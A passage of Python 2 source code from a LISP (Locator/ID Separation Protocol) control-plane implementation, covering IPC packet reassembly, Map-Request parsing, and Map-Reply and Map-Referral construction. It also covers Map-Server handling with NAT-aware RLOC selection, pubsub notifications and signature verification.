if (set_ttl): lisp_set_ttl(lisp_socket, LISP_RLOC_PROBE_TTL)
#endif
try: lisp_socket.sendto(packet, (address, port))
except socket.error, e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#
# Set back to default TTL.
#
if (set_ttl): lisp_set_ttl(lisp_socket, 64)
return
#enddef
#
# lisp_receive_segments
#
# Process 1500 byte segments if received IPC packet greater than what sockets
# can support.
#
def lisp_receive_segments(lisp_socket, packet, source, total_length):
#
# If the total length is equal to the segment length. We only have one
# segment which is the packet. Return it.
#
segment_len = total_length - len(packet)
if (segment_len == 0): return([True, packet])
lprint("Received {}-out-of-{} byte segment from {}".format(len(packet),
total_length, source))
#
# Otherwise, receive each segment and assemble it to return entire packet
# to caller.
#
length = segment_len
while (length > 0):
try: segment = lisp_socket.recvfrom(9000)
except: return([False, None])
segment = segment[0]
#
# The sender gave up and sent a new message that made it to us, last
# partial packet must be dropped.
#
if (segment.find("packet@") == 0):
seg = segment.split("@")
lprint("Received new message ({}-out-of-{}) while receiving " + \
"fragments, old message discarded", len(segment),
seg[1] if len(seg) > 2 else "?")
return([False, segment])
#endif
length -= len(segment)
packet += segment
lprint("Received {}-out-of-{} byte segment from {}".format( \
len(segment), total_length, source))
#endwhile
return([True, packet])
#enddef
#
# lisp_bit_stuff
#
# For every element in the array, insert a 0x40 ("@"). This is a bit-stuffing
# procedure. Only look array elemsnts with index 2 and above.
#
def lisp_bit_stuff(payload):
lprint("Bit-stuffing, found {} segments".format(len(payload)))
packet = ""
for segment in payload: packet += segment + "\x40"
return(packet[:-1])
#enddef
#
# lisp_receive
#
# Wait for packet to come in. This function call will block. For command
# IPCs, we need to loop to assemble all segments.
#
# For an internal socket, the format of a recvfrom() 'packet-data' is:
#
# "command" @ <total-length> @ <source> @ <packet-buffer>
# "packet" @ <total-length> @ <source> @ <command-buffer>
#
# So when an array of length 4 does not exist, we are receiving a fragment.
#
# For an external network socket, the format of a recvfrom() is:
#
# packet_data[0] = <packet-buffer>
# packet_data[1] = [<source>, <port>]
#
def lisp_receive(lisp_socket, internal):
while (True):
#
# Read from socket. Return if we received an error.
#
try: packet_data = lisp_socket.recvfrom(9000)
except: return(["", "", "", ""])
#
# This is a packet received on the network. If it was fragmented at the
# sender, then IP did it so it is assebled into a complete datagram
# in this sytem.
#
if (internal == False):
packet = packet_data[0]
source = lisp_convert_6to4(packet_data[1][0])
port = packet_data[1][1]
if (port == LISP_DATA_PORT):
do_log = lisp_data_plane_logging
packet_str = lisp_format_packet(packet[0:60]) + " ..."
else:
do_log = True
packet_str = lisp_format_packet(packet)
#endif
if (do_log):
lprint("{} {} bytes {} {}, packet: {}".format(bold("Receive",
False), len(packet), bold("from " + source, False), port,
packet_str))
#endif
return(["packet", source, port, packet])
#endif
#
# This is an IPC message that can be fragmented by lisp-core or the
# sending socket interface.
#
assembled = False
data = packet_data[0]
loop = False
while (assembled == False):
data = data.split("@")
if (len(data) < 4):
lprint("Possible fragment (length {}), from old message, " + \
"discarding", len(data[0]))
loop = True
break
#endif
opcode = data[0]
try:
total_length = int(data[1])
except:
error_str = bold("Internal packet reassembly error", False)
lprint("{}: {}".format(error_str, packet_data))
loop = True
break
#endtry
source = data[2]
port = data[3]
#
# If any of the data payload has a 0x40 byte (which is "@" in
# ascii), we will confuse the IPC separator from real data.
# So go to the payload and put in 0x40 where split() seperated
# the data. This particularly happens with Map-Notify messages
# since the first byte of the message is 0x40.
#
if (len(data) > 5):
packet = lisp_bit_stuff(data[4::])
else:
packet = data[4]
#endif
#
# Check for reassembly. Once reassembled, then we can process one
# large packet.
#
assembled, packet = lisp_receive_segments(lisp_socket, packet,
source, total_length)
if (packet == None): return(["", "", "", ""])
#
# We did not finish assembling a message but the sender sent a new
# one.
#
if (assembled == False):
data = packet
continue
#endif
if (port == ""): port = "no-port"
if (opcode == "command" and lisp_i_am_core == False):
index = packet.find(" {")
command = packet if index == -1 else packet[:index]
command = ": '" + command + "'"
else:
command = ""
#endif
lprint("{} {} bytes {} {}, {}{}".format(bold("Receive", False),
len(packet), bold("from " + source, False), port, opcode,
command if (opcode in ["command", "api"]) else ": ... " if \
(opcode == "data-packet") else \
": " + lisp_format_packet(packet)))
#endif
#endwhile
if (loop): continue
return([opcode, source, port, packet])
#endwhile
#enddef
#
# lisp_parse_packet
#
# Parse LISP control message.
#
def lisp_parse_packet(lisp_sockets, packet, source, udp_sport, ttl=-1):
trigger_flag = False
timestamp = time.time()
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return(trigger_flag)
#endif
#
# Store source in internal lisp_address() format.
#
from_ipc = source
if (source.find("lisp") == -1):
s = lisp_address(LISP_AFI_NONE, "", 0, 0)
s.string_to_afi(source)
s.store_address(source)
source = s
#endif
if (header.type == LISP_MAP_REQUEST):
lisp_process_map_request(lisp_sockets, packet, None, 0, source,
udp_sport, False, ttl, timestamp)
elif (header.type == LISP_MAP_REPLY):
lisp_process_map_reply(lisp_sockets, packet, source, ttl, timestamp)
elif (header.type == LISP_MAP_REGISTER):
lisp_process_map_register(lisp_sockets, packet, source, udp_sport)
elif (header.type == LISP_MAP_NOTIFY):
if (from_ipc == "lisp-etr"):
lisp_process_multicast_map_notify(packet, source)
else:
if (lisp_is_running("lisp-rtr")):
lisp_process_multicast_map_notify(packet, source)
#endif
lisp_process_map_notify(lisp_sockets, packet, source)
#endif
elif (header.type == LISP_MAP_NOTIFY_ACK):
lisp_process_map_notify_ack(packet, source)
elif (header.type == LISP_MAP_REFERRAL):
lisp_process_map_referral(lisp_sockets, packet, source)
elif (header.type == LISP_NAT_INFO and header.is_info_reply()):
x, y, trigger_flag = lisp_process_info_reply(source, packet, True)
elif (header.type == LISP_NAT_INFO and header.is_info_reply() == False):
addr_str = source.print_address_no_iid()
lisp_process_info_request(lisp_sockets, packet, addr_str, udp_sport,
None)
elif (header.type == LISP_ECM):
lisp_process_ecm(lisp_sockets, packet, source, udp_sport)
else:
lprint("Invalid LISP control packet type {}".format(header.type))
#endif
return(trigger_flag)
#enddef
#
# lisp_process_rloc_probe_request
#
# Process Map-Request with RLOC-probe bit set.
#
def lisp_process_rloc_probe_request(lisp_sockets, map_request, source, port,
ttl, timestamp):
p = bold("RLOC-probe", False)
if (lisp_i_am_etr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_etr_process_map_request(lisp_sockets, map_request, source, port,
ttl, timestamp)
return
#endif
if (lisp_i_am_rtr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_rtr_process_map_request(lisp_sockets, map_request, source, port,
ttl, timestamp)
return
#endif
lprint("Ignoring received {} Map-Request, not an ETR or RTR".format(p))
return
#enddef
#
# lisp_process_smr
#
def lisp_process_smr(map_request):
lprint("Received SMR-based Map-Request")
return
#enddef
#
# lisp_process_smr_invoked_request
#
def lisp_process_smr_invoked_request(map_request):
lprint("Received SMR-invoked Map-Request")
return
#enddef
#
# lisp_build_map_reply
#
# Build a Map-Reply and return a packet to the caller.
#
def lisp_build_map_reply(eid, group, rloc_set, nonce, action, ttl, map_request,
keys, enc, auth, mr_ttl=-1):
rloc_probe = map_request.rloc_probe if (map_request != None) else False
json_telemetry = map_request.json_telemetry if (map_request != None) else \
None
map_reply = lisp_map_reply()
map_reply.rloc_probe = rloc_probe
map_reply.echo_nonce_capable = enc
map_reply.hop_count = 0 if (mr_ttl == -1) else mr_ttl
map_reply.record_count = 1
map_reply.nonce = nonce
packet = map_reply.encode()
map_reply.print_map_reply()
eid_record = lisp_eid_record()
eid_record.rloc_count = len(rloc_set)
if (json_telemetry != None): eid_record.rloc_count += 1
eid_record.authoritative = auth
eid_record.record_ttl = ttl
eid_record.action = action
eid_record.eid = eid
eid_record.group = group
packet += eid_record.encode()
eid_record.print_record(" ", False)
local_rlocs = lisp_get_all_addresses() + lisp_get_all_translated_rlocs()
probing_rloc = None
for rloc_entry in rloc_set:
multicast = rloc_entry.rloc.is_multicast_address()
rloc_record = lisp_rloc_record()
probe_bit = rloc_probe and (multicast or json_telemetry == None)
addr_str = rloc_entry.rloc.print_address_no_iid()
if (addr_str in local_rlocs or multicast):
rloc_record.local_bit = True
rloc_record.probe_bit = probe_bit
rloc_record.keys = keys
if (rloc_entry.priority == 254 and lisp_i_am_rtr):
rloc_record.rloc_name = "RTR"
#endif
if (probing_rloc == None): probing_rloc = rloc_entry.rloc
#endif
rloc_record.store_rloc_entry(rloc_entry)
rloc_record.reach_bit = True
rloc_record.print_record(" ")
packet += rloc_record.encode()
#endfor
#
# Add etr-out-ts if telemetry data was present in Map-Request.
#
if (json_telemetry != None):
rloc_record = lisp_rloc_record()
if (probing_rloc): rloc_record.rloc.copy_address(probing_rloc)
rloc_record.local_bit = True
rloc_record.probe_bit = True
rloc_record.reach_bit = True
js = lisp_encode_telemetry(json_telemetry, eo=str(time.time()))
rloc_record.json = lisp_json("telemetry", js)
rloc_record.print_record(" ")
packet += rloc_record.encode()
#endif
return(packet)
#enddef
#
# lisp_build_map_referral
#
# Build a Map-Referral and return a packet to the caller.
#
def lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce):
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
eid_record = lisp_eid_record()
rloc_count = 0
if (ddt_entry == None):
eid_record.eid = eid
eid_record.group = group
else:
rloc_count = len(ddt_entry.delegation_set)
eid_record.eid = ddt_entry.eid
eid_record.group = ddt_entry.group
ddt_entry.map_referrals_sent += 1
#endif
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
#
# Use action passed into this function. But if NULL, select the action
# based on the first ddt-node child type.
#
incomplete = False
if (action == LISP_DDT_ACTION_NULL):
if (rloc_count == 0):
action = LISP_DDT_ACTION_NODE_REFERRAL
else:
ddt_node = ddt_entry.delegation_set[0]
if (ddt_node.is_ddt_child()):
action = LISP_DDT_ACTION_NODE_REFERRAL
#endif
if (ddt_node.is_ms_child()):
action = LISP_DDT_ACTION_MS_REFERRAL
#endif
#endif
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (lisp_i_am_ms and ddt_node.is_ms_peer() == False)
#endif
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
if (rloc_count == 0): return(packet)
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
return(packet)
#enddef
#
# lisp_etr_process_map_request
#
# Do ETR processing of a Map-Request.
#
def lisp_etr_process_map_request(lisp_sockets, map_request, source, sport,
ttl, etr_in_ts):
if (map_request.target_group.is_null()):
db = lisp_db_for_lookups.lookup_cache(map_request.target_eid, False)
else:
db = lisp_db_for_lookups.lookup_cache(map_request.target_group, False)
if (db): db = db.lookup_source_cache(map_request.target_eid, False)
#endif
eid_str = map_request.print_prefix()
if (db == None):
lprint("Database-mapping entry not found for requested EID {}". \
format(green(eid_str, False)))
return
#endif
prefix_str = db.print_eid_tuple()
lprint("Found database-mapping EID-prefix {} for requested EID {}". \
format(green(prefix_str, False), green(eid_str, False)))
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address() and lisp_nat_traversal):
itr_rloc = source
#endif
nonce = map_request.nonce
enc = lisp_nonce_echoing
keys = map_request.keys
#
# If we found telemetry data in the Map-Request, add the input timestamp
# now and add output timestamp when building the Map-Reply.
#
jt = map_request.json_telemetry
if (jt != None):
map_request.json_telemetry = lisp_encode_telemetry(jt, ei=etr_in_ts)
#endif
db.map_replies_sent += 1
packet = lisp_build_map_reply(db.eid, db.group, db.rloc_set, nonce,
LISP_NO_ACTION, 1440, map_request, keys, enc, True, ttl)
#
# If we are sending a RLOC-probe Map-Reply to an RTR, data encapsulate it.
# If we are getting RLOC-probe Map-Requests from an xTR behind a NAT, and
# we are an ETR not behind a NAT, we want return the RLOC-probe Map-Reply
# to the swapped control ports.
#
# We could be getting a RLOC-probe from an xTR that is behind the same
# NAT as us. So do not data encapsulate the RLOC-probe reply.
#
# There is a special hack here. If the sport is 0, this RLOC-probe
# request is coming from an RTR. If we are doing gleaning on the RTR,
# this xTR needs to data encapsulate the RLOC-probe reply. The lisp_rtr_
# list will not be set because a gleaned xTR does not have NAT-traversal
# enabled.
#
if (map_request.rloc_probe and len(lisp_sockets) == 4):
public = (itr_rloc.is_private_address() == False)
rtr = itr_rloc.print_address_no_iid()
if ((public and lisp_rtr_list.has_key(rtr)) or sport == 0):
lisp_encapsulate_rloc_probe(lisp_sockets, itr_rloc, None, packet)
return
#endif
#endif
#
# Send to lisp-core process to send packet from UDP port 4342.
#
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_rtr_process_map_request
#
# Do ETR processing of a Map-Request.
#
def lisp_rtr_process_map_request(lisp_sockets, map_request, source, sport,
ttl, etr_in_ts):
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address()): itr_rloc = source
nonce = map_request.nonce
eid = map_request.target_eid
group = map_request.target_group
rloc_set = []
for myrloc in [lisp_myrlocs[0], lisp_myrlocs[1]]:
if (myrloc == None): continue
rloc = lisp_rloc()
rloc.rloc.copy_address(myrloc)
rloc.priority = 254
rloc_set.append(rloc)
#endfor
enc = lisp_nonce_echoing
keys = map_request.keys
#
# If we found telemetry data in the Map-Request, add the input timestamp
# now and add output timestamp in building the Map-Reply.
#
jt = map_request.json_telemetry
if (jt != None):
map_request.json_telemetry = lisp_encode_telemetry(jt, ei=etr_in_ts)
#endif
packet = lisp_build_map_reply(eid, group, rloc_set, nonce, LISP_NO_ACTION,
1440, map_request, keys, enc, True, ttl)
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_get_private_rloc_set
#
# If the source-EID and target-EID of a Map-Request are behind the same NAT,
# that is, have the same global RLOC address, then return just the private
# addresses in the Map-Reply so the xTRs have shortest RLOC paths between
# each other and don't have to hair-pin through the NAT/firewall device.
#
def lisp_get_private_rloc_set(target_site_eid, seid, group):
rloc_set = target_site_eid.registered_rlocs
source_site_eid = lisp_site_eid_lookup(seid, group, False)
if (source_site_eid == None): return(rloc_set)
#
# Get global RLOC address from target site.
#
target_rloc = None
new_set = []
for rloc_entry in rloc_set:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()):
new_rloc = copy.deepcopy(rloc_entry)
new_set.append(new_rloc)
continue
#endif
target_rloc = rloc_entry
break
#endfor
if (target_rloc == None): return(rloc_set)
target_rloc = target_rloc.rloc.print_address_no_iid()
#
# Get global RLOC address from source site.
#
source_rloc = None
for rloc_entry in source_site_eid.registered_rlocs:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()): continue
source_rloc = rloc_entry
break
#endfor
if (source_rloc == None): return(rloc_set)
source_rloc = source_rloc.rloc.print_address_no_iid()
#
# If the xTRs are behind the same NAT, then we return private addresses.
#
site_id = target_site_eid.site_id
if (site_id == 0):
if (source_rloc == target_rloc):
lprint("Return private RLOCs for sites behind {}".format( \
target_rloc))
return(new_set)
#endif
return(rloc_set)
#endif
#
# If the xTRs are not behind the same NAT, but are configured in the
# same site-id, they can reach each other with private addresses. So
# return them in the RLOC-set.
#
if (site_id == source_site_eid.site_id):
lprint("Return private RLOCs for sites in site-id {}".format(site_id))
return(new_set)
#endif
return(rloc_set)
#enddef
#
# lisp_get_partial_rloc_set
#
# If the Map-Request source is found in the RLOC-set, return all RLOCs that
# do not have the same priority as the Map-Request source (an RTR supporting
# NAT-traversal) RLOC. Otherwise, return all RLOCs that are not priority 254.
#
def lisp_get_partial_rloc_set(registered_rloc_set, mr_source, multicast):
rtr_list = []
rloc_set = []
#
# Search the RTR list to see if the Map-Requestor is an RTR. If so,
# return the RLOC-set to the RTR so it can replicate directly to ETRs.
# Otherwise, return the RTR-list locator-set to the requesting ITR/PITR.
#
rtr_is_requestor = False
behind_nat = False
for rloc_entry in registered_rloc_set:
if (rloc_entry.priority != 254): continue
behind_nat |= True
if (rloc_entry.rloc.is_exact_match(mr_source) == False): continue
rtr_is_requestor = True
break
#endfor
#
# If we find an RTR in the RLOC-set, then the site's RLOC-set is behind
# a NAT. Otherwise, do not return a partial RLOC-set. This RLOC-set is in
# public space.
#
if (behind_nat == False): return(registered_rloc_set)
#
# An RTR can be behind a NAT when deployed in a cloud infrastructure.
# When the MS is in the same cloud infrastructure, the source address
# of the Map-Request (ECM) is not translated. So we are forced to put
# the private address in the rtr-list the MS advertises. But we should
# not return the private address in any Map-Replies. We use the private
# address in the rtr-list for the sole purpose to identify the RTR so
# we can return the RLOC-set of the ETRs.
#
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
#
# Create two small lists. A list of RTRs which are unicast priority of
# 254 and a rloc-set which are records that are not priority 254.
#
for rloc_entry in registered_rloc_set:
if (ignore_private and rloc_entry.rloc.is_private_address()): continue
if (multicast == False and rloc_entry.priority == 255): continue
if (multicast and rloc_entry.mpriority == 255): continue
if (rloc_entry.priority == 254):
rtr_list.append(rloc_entry)
else:
rloc_set.append(rloc_entry)
#endif
#endif
#
# The RTR is sending the Map-Request.
#
if (rtr_is_requestor): return(rloc_set)
#
# An ITR is sending the Map-Request.
#
# Chcek the case where an ETR included a local RLOC and may be behind
# the same NAT as the requester. In this case, the requester can encap
# directly the private RLOC. If it is not reachable, the ITR can encap
# to the RTR. The ITR will cache a subset of the RLOC-set in this entry
# (so it can check the global RLOC first and not encap to itself).
#
rloc_set = []
for rloc_entry in registered_rloc_set:
if (rloc_entry.rloc.is_private_address()): rloc_set.append(rloc_entry)
#endfor
rloc_set += rtr_list
return(rloc_set)
#enddef
#
# lisp_store_pubsub_state
#
# Take information from Map-Request to create a pubsub cache. We remember
# the map-server lookup EID-prefix. So when the RLOC-set changes for this
# EID-prefix, we trigger a Map-Notify messate to the ITR's RLOC and port
# number.
#
def lisp_store_pubsub_state(reply_eid, itr_rloc, mr_sport, nonce, ttl, xtr_id):
pubsub = lisp_pubsub(itr_rloc, mr_sport, nonce, ttl, xtr_id)
pubsub.add(reply_eid)
return
#enddef
#
# lisp_convert_reply_to_notify
#
# In lisp_ms_process_map_request(), a proxy map-reply is built to return to
# a requesting ITR. If the requesting ITR set the N-bit in the Map-Request,
# a subscription request is being requested, return a Map-Notify so it knows
# it has been acked.
#
# This function takes a fully built Map-Reply, changes the first 4 bytes to
# make the message a Map-Notify and inserts 4-bytes of Key-ID, Alg-ID, and
# Authentication Length of 0. Then we have converted the Map-Reply into a
# Map-Notify.
#
def lisp_convert_reply_to_notify(packet):
#
# Get data we need from Map-Reply for Map-Notify.
#
record_count = struct.unpack("I", packet[0:4])[0]
record_count = socket.ntohl(record_count) & 0xff
nonce = packet[4:12]
packet = packet[12::]
#
# Build Map-Notify header.
#
first_long = (LISP_MAP_NOTIFY << 28) | record_count
header = struct.pack("I", socket.htonl(first_long))
auth = struct.pack("I", 0)
#
# Concat fields of Map-Notify.
#
packet = header + nonce + auth + packet
return(packet)
#enddef
#
# lisp_notify_subscribers
#
# There has been an RLOC-set change, inform all subscribers who have subscribed
# to this EID-prefix.
#
def lisp_notify_subscribers(lisp_sockets, eid_record, eid, site):
eid_str = eid.print_prefix()
if (lisp_pubsub_cache.has_key(eid_str) == False): return
for pubsub in lisp_pubsub_cache[eid_str].values():
itr = pubsub.itr
port = pubsub.port
itr_str = red(itr.print_address_no_iid(), False)
sub_str = bold("subscriber", False)
xtr_id = "0x" + lisp_hex_string(pubsub.xtr_id)
nonce = "0x" + lisp_hex_string(pubsub.nonce)
lprint(" Notify {} {}:{} xtr-id {} for {}, nonce {}".format( \
sub_str, itr_str, port, xtr_id, green(eid_str, False), nonce))
lisp_build_map_notify(lisp_sockets, eid_record, [eid_str], 1, itr,
port, pubsub.nonce, 0, 0, 0, site, False)
pubsub.map_notify_count += 1
#endfor
return
#enddef
#
# lisp_process_pubsub
#
# Take a fully built Map-Reply and send a Map-Notify as a pubsub ack.
#
def lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc, port, nonce,
ttl, xtr_id):
#
# Store subscriber state.
#
lisp_store_pubsub_state(reply_eid, itr_rloc, port, nonce, ttl, xtr_id)
eid = green(reply_eid.print_prefix(), False)
itr = red(itr_rloc.print_address_no_iid(), False)
mn = bold("Map-Notify", False)
xtr_id = "0x" + lisp_hex_string(xtr_id)
lprint("{} pubsub request for {} to ack ITR {} xtr-id: {}".format(mn,
eid, itr, xtr_id))
#
# Convert Map-Reply to Map-Notify header and send out.
#
packet = lisp_convert_reply_to_notify(packet)
lisp_send_map_notify(lisp_sockets, packet, itr_rloc, port)
return
#enddef
#
# lisp_ms_process_map_request
#
# Do Map-Server processing of a Map-Request. Returns various LISP-DDT internal
# and external action values.
#
def lisp_ms_process_map_request(lisp_sockets, packet, map_request, mr_source,
mr_sport, ecm_source):
#
# Look up EID in site cache. If we find it and it has registered for
# proxy-replying, this map-server will send the Map-Reply. Otherwise,
# send to one of the ETRs at the registered site.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
itr_rloc = map_request.itr_rlocs[0]
xtr_id = map_request.xtr_id
nonce = map_request.nonce
action = LISP_NO_ACTION
pubsub = map_request.subscribe_bit
#
# Check if we are verifying Map-Request signatures. If so, do a mapping
# database lookup on the source-EID to get public-key.
#
sig_good = True
is_crypto_hash = (lisp_get_eid_hash(eid) != None)
if (is_crypto_hash):
sig = map_request.map_request_signature
if (sig == None):
sig_good = False
lprint(("EID-crypto-hash signature verification {}, " + \
"no signature found").format(bold("failed", False)))
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("EID-crypto-hash signature verification {}".format(pf))
#endif
#endif
if (pubsub and sig_good == False):
pubsub = False
lprint("Suppress creating pubsub state due to signature failure")
#endif
#
# There are two cases here that need attention. If the Map-Request was
# an IPv6 Map-Request but the ECM came to us in a IPv4 packet, we need
# to return the Map-Reply in IPv4. And if the Map-Request came to us
# through a NAT, sending the Map-Reply to the Map-Request port won't
# get translated by the NAT. So we have to return the Map-Reply to the
# ECM port. Hopefully, the RTR is listening on the ECM port and using
# the Map-Request port as the ECM port as well. This is typically only
# a problem on the RTR, when behind a NAT. For an ITR, it usaully
# doesn't send Map-Requests since NAT-traversal logic installs default
# map-cache entries.
#
reply_dest = itr_rloc if (itr_rloc.afi == ecm_source.afi) else ecm_source
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None or site_eid.is_star_g()):
notfound = bold("Site not found", False)
lprint("{} for requested EID {}".format(notfound,
green(eid_str, False)))
#
# Send negative Map-Reply with TTL 15 minutes.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, 15, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_SITE_NOT_FOUND])
#endif
prefix_str = site_eid.print_eid_tuple()
site_name = site_eid.site.site_name
#
# If we are requesting for non Crypto-EIDs and signatures are configured
# to be requred and no signature is in the Map-Request, bail.
#
if (is_crypto_hash == False and site_eid.require_signature):
sig = map_request.map_request_signature
sig_eid = map_request.signature_eid
if (sig == None or sig_eid.is_null()):
lprint("Signature required for site {}".format(site_name))
sig_good = False
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("Required signature verification {}".format(pf))
#endif
#endif
#
# Check if site-eid is registered.
#
if (sig_good and site_eid.registered == False):
lprint("Site '{}' with EID-prefix {} is not registered for EID {}". \
format(site_name, green(prefix_str, False), green(eid_str, False)))
#
# We do not to return a coarser EID-prefix to the Map-Resolver. The
# AMS site entry may be one.
#
if (site_eid.accept_more_specifics == False):
eid = site_eid.eid
group = site_eid.group
#endif
#
# Send forced-TTLs even for native-forward entries.
#
ttl = 1
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Send negative Map-Reply with TTL 1 minute.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, ttl, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_MS_NOT_REG])
#endif
#
# Should we proxy-reply?
#
nat = False
pr_str = ""
check_policy = False
if (site_eid.force_nat_proxy_reply):
pr_str = ", nat-forced"
nat = True
check_policy = True
elif (site_eid.force_proxy_reply):
pr_str = ", forced"
check_policy = True
elif (site_eid.proxy_reply_requested):
pr_str = ", requested"
check_policy = True
elif (map_request.pitr_bit and site_eid.pitr_proxy_reply_drop):
pr_str = ", drop-to-pitr"
action = LISP_DROP_ACTION
elif (site_eid.proxy_reply_action != ""):
action = site_eid.proxy_reply_action
pr_str = ", forced, action {}".format(action)
action = LISP_DROP_ACTION if (action == "drop") else \
LISP_NATIVE_FORWARD_ACTION
#endif
#
# Apply policy to determine if we send a negative map-reply with action
# "policy-denied" or we send a map-reply with the policy set parameters.
#
policy_drop = False
policy = None
if (check_policy and lisp_policies.has_key(site_eid.policy)):
p = lisp_policies[site_eid.policy]
if (p.match_policy_map_request(map_request, mr_source)): policy = p
if (policy):
ps = bold("matched", False)
lprint("Map-Request {} policy '{}', set-action '{}'".format(ps,
p.policy_name, p.set_action))
else:
ps = bold("no match", False)
lprint("Map-Request {} for policy '{}', implied drop".format(ps,
p.policy_name))
policy_drop = True
#endif
#endif
if (pr_str != ""):
lprint("Proxy-replying for EID {}, found site '{}' EID-prefix {}{}". \
format(green(eid_str, False), site_name, green(prefix_str, False),
pr_str))
rloc_set = site_eid.registered_rlocs
ttl = 1440
if (nat):
if (site_eid.site_id != 0):
seid = map_request.source_eid
rloc_set = lisp_get_private_rloc_set(site_eid, seid, group)
#endif
if (rloc_set == site_eid.registered_rlocs):
m = (site_eid.group.is_null() == False)
new_set = lisp_get_partial_rloc_set(rloc_set, reply_dest, m)
if (new_set != rloc_set):
ttl = 15
rloc_set = new_set
#endif
#endif
#endif
#
# Force TTL if configured. To denote seconds in TTL field of EID-record
# set high-order bit in ttl value.
#
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Does policy say what the ttl should be? And if we should drop the
# Map-Request and return a negative Map-Reply
#
if (policy):
if (policy.set_record_ttl):
ttl = policy.set_record_ttl
lprint("Policy set-record-ttl to {}".format(ttl))
#endif
if (policy.set_action == "drop"):
lprint("Policy set-action drop, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
else:
rloc = policy.set_policy_map_reply()
if (rloc): rloc_set = [rloc]
#endif
#endif
if (policy_drop):
lprint("Implied drop action, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
#endif
enc = site_eid.echo_nonce_capable
#
# Don't tell spoofer any prefix information about the target EID.
#
if (sig_good):
reply_eid = site_eid.eid
reply_group = site_eid.group
else:
reply_eid = eid
reply_group = group
action = LISP_AUTH_FAILURE_ACTION
rloc_set = []
#endif
#
# If this Map-Request is also a subscription request, return same
# information in a Map-Notify.
#
packet = lisp_build_map_reply(reply_eid, reply_group, rloc_set,
nonce, action, ttl, map_request, None, enc, False)
if (pubsub):
lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc,
mr_sport, nonce, ttl, xtr_id)
else:
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, mr_sport)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# If there are no registered RLOCs, return.
#
rloc_count = len(site_eid.registered_rlocs)
if (rloc_count == 0):
lprint("Requested EID {} found site '{}' with EID-prefix {} with " + \
"no registered RLOCs".format(green(eid_str, False), site_name,
green(prefix_str, False)))
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# Forward to ETR at registered site. We have to put in an ECM.
#
hash_address = map_request.target_eid if map_request.source_eid.is_null() \
else map_request.source_eid
hashval = map_request.target_eid.hash_address(hash_address)
hashval %= rloc_count
etr = site_eid.registered_rlocs[hashval]
if (etr.rloc.is_null()):
lprint(("Suppress forwarding Map-Request for EID {} at site '{}' " + \
"EID-prefix {}, no RLOC address").format(green(eid_str, False),
site_name, green(prefix_str, False)))
else:
lprint(("Forwarding Map-Request for EID {} to ETR {} at site '{}' " + \
"EID-prefix {}").format(green(eid_str, False),
red(etr.rloc.print_address(), False), site_name,
green(prefix_str, False)))
#
# Send ECM.
#
lisp_send_ecm(lisp_sockets, packet, map_request.source_eid, mr_sport,
map_request.target_eid, etr.rloc, to_etr=True)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#enddef
#
# lisp_ddt_process_map_request
#
# Do DDT-node processing of a Map-Request received from an Map-Resolver.
#
